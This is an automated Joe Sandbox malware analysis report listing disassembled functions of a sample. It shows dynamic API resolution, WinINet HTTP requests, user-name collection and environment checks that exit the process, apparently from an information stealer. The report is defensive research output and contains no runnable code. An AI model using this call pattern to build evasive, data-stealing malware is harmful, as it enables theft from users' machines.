GetProcAddress.KERNEL32(76210000,00FC2CE0), ref: 00749964
GetProcAddress.KERNEL32(76210000,00FC2D40), ref: 0074997C
GetProcAddress.KERNEL32(76210000,00FC2C08), ref: 00749995
GetProcAddress.KERNEL32(76210000,00FC2B48), ref: 007499AD
GetProcAddress.KERNEL32(76210000,00FBAD28), ref: 007499C5
GetProcAddress.KERNEL32(76210000,00FC2BD8), ref: 007499DE
GetProcAddress.KERNEL32(76210000,00FC2D70), ref: 007499F6
GetProcAddress.KERNEL32(76210000,00FBAD48), ref: 00749A0E
GetProcAddress.KERNEL32(76210000,00FC2BF0), ref: 00749A27
GetProcAddress.KERNEL32(76210000,00FC2C68), ref: 00749A3F
GetProcAddress.KERNEL32(76210000,00FBAD68), ref: 00749A57
GetProcAddress.KERNEL32(76210000,00FC2E30), ref: 00749A70
GetProcAddress.KERNEL32(76210000,00FBAD88), ref: 00749A88
LoadLibraryA.KERNEL32(00FC2E78,?,00746A00), ref: 00749A9A
LoadLibraryA.KERNEL32(00FC2E18,?,00746A00), ref: 00749AAB
LoadLibraryA.KERNEL32(00FC2E60,?,00746A00), ref: 00749ABD
LoadLibraryA.KERNEL32(00FC2E90,?,00746A00), ref: 00749ACF
LoadLibraryA.KERNEL32(00FC2E48,?,00746A00), ref: 00749AE0
GetProcAddress.KERNEL32(75B30000,00FC2EA8), ref: 00749B02
GetProcAddress.KERNEL32(751E0000,00FC2EC0), ref: 00749B23
GetProcAddress.KERNEL32(751E0000,00FC2E00), ref: 00749B3B
GetProcAddress.KERNEL32(76910000,00FC3B28), ref: 00749B5D
GetProcAddress.KERNEL32(75670000,00FBADA8), ref: 00749B7E
GetProcAddress.KERNEL32(77310000,00FC1548), ref: 00749B9F
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00749BB6

Strings

Fs, xrefs: 00749B41
NtQueryInformationProcess, xrefs: 00749BAA

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Fs$NtQueryInformationProcess
API String ID: 2238633743-1241331114
Opcode ID: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
Instruction ID: 6383a1bc5514ee6f439ef5f8b09a4e6b0de778a4e1fd888e881c067a08f67548
Opcode Fuzzy Hash: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
Instruction Fuzzy Hash: 8DA12DB792C2409FD348DFA8ED8999E37F9F7C8701B04451AA61D83264E73998C1EB53

Function 00734880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00734915
StrCmpCA.SHLWAPI(?,00FCD800), ref: 0073493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00734ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00750DDB,00000000,?,?,00000000,?,",00000000,?,00FCD830), ref: 00734DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00734E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00734E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00734E49
InternetCloseHandle.WININET(00000000), ref: 00734EAD
InternetCloseHandle.WININET(00000000), ref: 00734EC5
HttpOpenRequestA.WININET(00000000,00FCD8E0,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00734B15

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

InternetCloseHandle.WININET(00000000), ref: 00734ECF

Strings

------, xrefs: 00734B28
", xrefs: 00734BF2
", xrefs: 00734D33
------, xrefs: 00734C69
------, xrefs: 007349BD

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: f095ea4774a36ccd02ca9b2b330ca3f2b4ffa7230d9e38404534395df6358fd9
Instruction ID: c3bca0b6043f1f2044c4e250e854236ff67cb1ce01e1685f9f8b79488d1efed6
Opcode Fuzzy Hash: f095ea4774a36ccd02ca9b2b330ca3f2b4ffa7230d9e38404534395df6358fd9
Instruction Fuzzy Hash: B712BB72950218FAEB15EB90DC96FEEB378BF54304F5141A9B10662091EF782F49CF62

Function 00747850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
HeapAlloc.KERNEL32(00000000,?,?,?,007311B7), ref: 00747887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
Instruction ID: 0fc1000819bb2c733b4fe4b34115e5f1dd076d559b116801c8553f402dc48a1b
Opcode Fuzzy Hash: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
Instruction Fuzzy Hash: C1F044F2D44208AFC714DF94DD45BAEBBB8E744711F100159F605A2680C7781544CBA2

Function 00731160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00746A17,00750AEF), ref: 0073116A
ExitProcess.KERNEL32 ref: 0073117E

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
Instruction ID: 09195dc73ec229a4b12212fc03d04d0ab56f39862070adf723894c03b26f29e3
Opcode Fuzzy Hash: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
Instruction Fuzzy Hash: ACD05E75D0430CDBCB04DFE0D8496DDBBB8FB48312F000554D90962340EA3058C2CAA6

Function 00749C10 Relevance: 203.7, APIs: 112, Strings: 4, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00FCA668), ref: 00749C2D
GetProcAddress.KERNEL32(76210000,00FCA768), ref: 00749C45
GetProcAddress.KERNEL32(76210000,00FC3B70), ref: 00749C5E
GetProcAddress.KERNEL32(76210000,00FC3B88), ref: 00749C76
GetProcAddress.KERNEL32(76210000,00FC3BA0), ref: 00749C8E
GetProcAddress.KERNEL32(76210000,00FC3BE8), ref: 00749CA7
GetProcAddress.KERNEL32(76210000,00FCB9E8), ref: 00749CBF
GetProcAddress.KERNEL32(76210000,00FC3E70), ref: 00749CD7
GetProcAddress.KERNEL32(76210000,00FC3E40), ref: 00749CF0
GetProcAddress.KERNEL32(76210000,00FC3E88), ref: 00749D08
GetProcAddress.KERNEL32(76210000,00FC3EB8), ref: 00749D20
GetProcAddress.KERNEL32(76210000,00FCA868), ref: 00749D39
GetProcAddress.KERNEL32(76210000,00FCA6A8), ref: 00749D51
GetProcAddress.KERNEL32(76210000,00FCA948), ref: 00749D69
GetProcAddress.KERNEL32(76210000,00FCA6C8), ref: 00749D82
GetProcAddress.KERNEL32(76210000,00FC3E58), ref: 00749D9A
GetProcAddress.KERNEL32(76210000,00FC3E10), ref: 00749DB2
GetProcAddress.KERNEL32(76210000,00FCB718), ref: 00749DCB
GetProcAddress.KERNEL32(76210000,00FCA8C8), ref: 00749DE3
GetProcAddress.KERNEL32(76210000,00FC3ED0), ref: 00749DFB
GetProcAddress.KERNEL32(76210000,00FC3EA0), ref: 00749E14
GetProcAddress.KERNEL32(76210000,00FC3E28), ref: 00749E2C
GetProcAddress.KERNEL32(76210000,00FCFA00), ref: 00749E44
GetProcAddress.KERNEL32(76210000,00FCA908), ref: 00749E5D
GetProcAddress.KERNEL32(76210000,00FCFB38), ref: 00749E75
GetProcAddress.KERNEL32(76210000,00FCFAC0), ref: 00749E8D
GetProcAddress.KERNEL32(76210000,00FCFC28), ref: 00749EA6
GetProcAddress.KERNEL32(76210000,00FCFC58), ref: 00749EBE
GetProcAddress.KERNEL32(76210000,00FCFC10), ref: 00749ED6
GetProcAddress.KERNEL32(76210000,00FCFB50), ref: 00749EEF
GetProcAddress.KERNEL32(76210000,00FCFB80), ref: 00749F07
GetProcAddress.KERNEL32(76210000,00FCFB08), ref: 00749F1F
GetProcAddress.KERNEL32(76210000,00FCFC88), ref: 00749F38
GetProcAddress.KERNEL32(76210000,00FC4540), ref: 00749F50
GetProcAddress.KERNEL32(76210000,00FCFB98), ref: 00749F68
GetProcAddress.KERNEL32(76210000,00FCFB20), ref: 00749F81
GetProcAddress.KERNEL32(76210000,00FCA708), ref: 00749F99
GetProcAddress.KERNEL32(76210000,00FCFA18), ref: 00749FB1
GetProcAddress.KERNEL32(76210000,00FCA788), ref: 00749FCA
GetProcAddress.KERNEL32(76210000,00FCFC40), ref: 00749FE2
GetProcAddress.KERNEL32(76210000,00FCFA30), ref: 00749FFA
GetProcAddress.KERNEL32(76210000,00FCA7C8), ref: 0074A013
GetProcAddress.KERNEL32(76210000,00FCA808), ref: 0074A02B
LoadLibraryA.KERNEL32(00FCFA78,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A03D
LoadLibraryA.KERNEL32(00FCF9A0,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A04E
LoadLibraryA.KERNEL32(00FCFAA8,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A060
LoadLibraryA.KERNEL32(00FCFAD8,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A072
LoadLibraryA.KERNEL32(00FCFA48,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A083
LoadLibraryA.KERNEL32(00FCFA60,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A095
LoadLibraryA.KERNEL32(00FCF9B8,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A0A7
LoadLibraryA.KERNEL32(00FCFA90,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A0B8
GetProcAddress.KERNEL32(751E0000,00FCA2C8), ref: 0074A0DA
GetProcAddress.KERNEL32(751E0000,00FCFAF0), ref: 0074A0F2
GetProcAddress.KERNEL32(751E0000,00FCD580), ref: 0074A10A
GetProcAddress.KERNEL32(751E0000,00FCFBB0), ref: 0074A123
GetProcAddress.KERNEL32(751E0000,00FCA4C8), ref: 0074A13B
GetProcAddress.KERNEL32(700F0000,00FCB768), ref: 0074A160
GetProcAddress.KERNEL32(700F0000,00FCA4A8), ref: 0074A179
GetProcAddress.KERNEL32(700F0000,00FCB790), ref: 0074A191
GetProcAddress.KERNEL32(700F0000,00FCFC70), ref: 0074A1A9
GetProcAddress.KERNEL32(700F0000,00FCFB68), ref: 0074A1C2
GetProcAddress.KERNEL32(700F0000,00FCA488), ref: 0074A1DA
GetProcAddress.KERNEL32(700F0000,00FCA428), ref: 0074A1F2
GetProcAddress.KERNEL32(700F0000,00FCFBC8), ref: 0074A20B
GetProcAddress.KERNEL32(753A0000,00FCA5A8), ref: 0074A22C
GetProcAddress.KERNEL32(753A0000,00FCA4E8), ref: 0074A244
GetProcAddress.KERNEL32(753A0000,00FCFBE0), ref: 0074A25D
GetProcAddress.KERNEL32(753A0000,00FCFBF8), ref: 0074A275
GetProcAddress.KERNEL32(753A0000,00FCA448), ref: 0074A28D
GetProcAddress.KERNEL32(76310000,00FCB858), ref: 0074A2B3
GetProcAddress.KERNEL32(76310000,00FCB7B8), ref: 0074A2CB
GetProcAddress.KERNEL32(76310000,00FCF9D0), ref: 0074A2E3
GetProcAddress.KERNEL32(76310000,00FCA508), ref: 0074A2FC
GetProcAddress.KERNEL32(76310000,00FCA348), ref: 0074A314
GetProcAddress.KERNEL32(76310000,00FCB808), ref: 0074A32C
GetProcAddress.KERNEL32(76910000,00FCF9E8), ref: 0074A352
GetProcAddress.KERNEL32(76910000,00FCA5C8), ref: 0074A36A
GetProcAddress.KERNEL32(76910000,00FCD620), ref: 0074A382
GetProcAddress.KERNEL32(76910000,00FCFCD0), ref: 0074A39B
GetProcAddress.KERNEL32(76910000,00FCFCB8), ref: 0074A3B3
GetProcAddress.KERNEL32(76910000,00FCA3A8), ref: 0074A3CB
GetProcAddress.KERNEL32(76910000,00FCA468), ref: 0074A3E4
GetProcAddress.KERNEL32(76910000,00FCFCE8), ref: 0074A3FC
GetProcAddress.KERNEL32(76910000,00FCFD00), ref: 0074A414
GetProcAddress.KERNEL32(75B30000,00FCA408), ref: 0074A436
GetProcAddress.KERNEL32(75B30000,00FCFD18), ref: 0074A44E
GetProcAddress.KERNEL32(75B30000,00FCFD30), ref: 0074A466
GetProcAddress.KERNEL32(75B30000,00FCFD48), ref: 0074A47F
GetProcAddress.KERNEL32(75B30000,00FCFCA0), ref: 0074A497
GetProcAddress.KERNEL32(75670000,00FCA368), ref: 0074A4B8
GetProcAddress.KERNEL32(75670000,00FCA628), ref: 0074A4D1
GetProcAddress.KERNEL32(76AC0000,00FCA268), ref: 0074A4F2
GetProcAddress.KERNEL32(76AC0000,00FCFD60), ref: 0074A50A
GetProcAddress.KERNEL32(6F4E0000,00FCA528), ref: 0074A530
GetProcAddress.KERNEL32(6F4E0000,00FCA288), ref: 0074A548
GetProcAddress.KERNEL32(6F4E0000,00FCA5E8), ref: 0074A560
GetProcAddress.KERNEL32(6F4E0000,00FD02D0), ref: 0074A579
GetProcAddress.KERNEL32(6F4E0000,00FCA548), ref: 0074A591
GetProcAddress.KERNEL32(6F4E0000,00FCA568), ref: 0074A5A9
GetProcAddress.KERNEL32(6F4E0000,00FCA2E8), ref: 0074A5C2
GetProcAddress.KERNEL32(6F4E0000,00FCA308), ref: 0074A5DA
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0074A5F1
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0074A607
GetProcAddress.KERNEL32(75AE0000,00FD0150), ref: 0074A629
GetProcAddress.KERNEL32(75AE0000,00FCD640), ref: 0074A641
GetProcAddress.KERNEL32(75AE0000,00FD0240), ref: 0074A659
GetProcAddress.KERNEL32(75AE0000,00FD0108), ref: 0074A672
GetProcAddress.KERNEL32(76300000,00FCA388), ref: 0074A693
GetProcAddress.KERNEL32(6E820000,00FD0198), ref: 0074A6B4
GetProcAddress.KERNEL32(6E820000,00FCA588), ref: 0074A6CD
GetProcAddress.KERNEL32(6E820000,00FD01C8), ref: 0074A6E5
GetProcAddress.KERNEL32(6E820000,00FD0288), ref: 0074A6FD

Strings

P2#v, xrefs: 00749E1A
InternetSetOptionA, xrefs: 0074A5E5
HttpQueryInfoA, xrefs: 0074A5FC
1#v, xrefs: 00749F0D

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$P2#v$1#v
API String ID: 2238633743-3014924196
Opcode ID: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
Instruction ID: dd93013a2c9dee22fa6d5496fada8367318fc83867a585dff32fd54f26967be4
Opcode Fuzzy Hash: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
Instruction Fuzzy Hash: 10622DB792C200AFC348DFA8ED8999E37F9F7CC601B14451AA61DC3264D63994C1EB53

Function 00736280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
HttpOpenRequestA.WININET(00000000,GET,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00736385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007363FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0073646D
InternetCloseHandle.WININET(00000000), ref: 007364EF
InternetCloseHandle.WININET(00000000), ref: 007364F9
InternetCloseHandle.WININET(00000000), ref: 00736503

Strings

ERROR, xrefs: 00736407
ERROR, xrefs: 007364C9
GET, xrefs: 0073637C

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: 479529121835fa872f99367033dfe5e1277dd004f1102bb36dd170b9826fdda8
Instruction ID: 457cc17c6f8fdcafd44b5d1a77931676667fbf6758abb1eb4c519170c449d6e8
Opcode Fuzzy Hash: 479529121835fa872f99367033dfe5e1277dd004f1102bb36dd170b9826fdda8
Instruction Fuzzy Hash: 25717F71A50218FBEB24DFA0CC49BEE77B8FB44701F108198F5096B191DBB86A85CF52

Function 007417A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 007417C5
ExitProcess.KERNEL32 ref: 007417D1
strtok_s.MSVCRT ref: 007417E8

Strings

block, xrefs: 007417B7

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: bd5191dfb5bd3664d88507349a8b101d8c0cd9f92a971311c24a28bf9d5dfe3b
Instruction ID: 10d40ff498a2f99c1d5a646b3edf2cdb6c4c0b76ba84d1c1afdb9b6fa8695b2a
Opcode Fuzzy Hash: bd5191dfb5bd3664d88507349a8b101d8c0cd9f92a971311c24a28bf9d5dfe3b
Instruction Fuzzy Hash: D1518AB5B1420AEFDB04EFA1D958AFE77B9BF44304F508048E806A7340D778E981DB62

Function 00745510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007456A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745857

